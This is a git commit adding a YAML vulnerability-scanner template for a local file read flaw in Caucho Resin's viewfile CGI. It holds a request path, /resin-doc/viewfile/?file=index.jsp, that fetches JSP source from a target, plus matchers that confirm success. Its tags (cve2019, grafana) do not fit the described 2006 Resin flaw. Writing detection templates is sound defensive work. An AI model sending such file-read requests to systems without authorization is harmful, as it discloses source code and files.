Create resin-viewfile-lfr.yaml

patch-1
Prince Chaddha 2021-04-22 14:46:29 +05:30 committed by GitHub
parent 039ddb4fa2
commit 175bd1780d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: resin-viewfile-lfr
info:
name: Caucho Resin LFR
author: princechaddha
severity: high
description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files.
reference: |
- http://0day5.com/archives/1173/
- https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205
tags: cve,cve2019,grafana
requests:
- method: GET
path:
- "{{BaseURL}}/resin-doc/viewfile/?file=index.jsp"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
name: node
words:
- "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %"
part: body